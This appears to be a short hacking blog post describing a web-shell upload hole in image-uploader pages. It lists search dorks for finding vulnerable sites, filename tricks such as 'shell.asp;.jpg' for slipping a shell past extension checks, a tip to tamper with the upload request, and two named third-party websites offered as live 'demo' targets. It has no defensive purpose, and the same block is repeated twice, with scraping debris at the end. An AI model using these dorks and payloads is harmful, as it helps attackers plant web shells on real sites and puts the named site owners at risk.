| Filename | IMAGE UPLOADER + SHELL UPLOAD VULNERABILITY |
| Permission | rw-r--r-- |
| Author | Lutfi rahman |
| Date and Time | 23.16 |
| Label | |
| Action |
[x] dork :
inurl:"default_image.asp"
inurl:"default_imagen.asp"
inurl:"/box_image.htm"
[x] Tested on : anything OS
[x] exploit - Shell Example : shell.asp;.jpg, shell.php;.jpg, *.gif, *.jpg, *.png, *.pdf, *.zip, *.html
[x]note - then upload them to your shell using firefox addons temperdata. or NOT!! ^_^
[x]demo :
https://www.thinkheartland.com/CMS/admin/default_Image.asp
http://www.dautphetal.de/edit/default_asset.asp
inurl:"default_image.asp"
inurl:"default_imagen.asp"
inurl:"/box_image.htm"
[x] Tested on : anything OS
[x] exploit - Shell Example : shell.asp;.jpg, shell.php;.jpg, *.gif, *.jpg, *.png, *.pdf, *.zip, *.html
[x]note - then upload them to your shell using firefox addons temperdata. or NOT!! ^_^
[x]demo :
https://www.thinkheartland.com/CMS/admin/default_Image.asp
http://www.dautphetal.de/edit/default_asset.asp
.png "English"){kind=small}
0 komentar:
Posting Komentar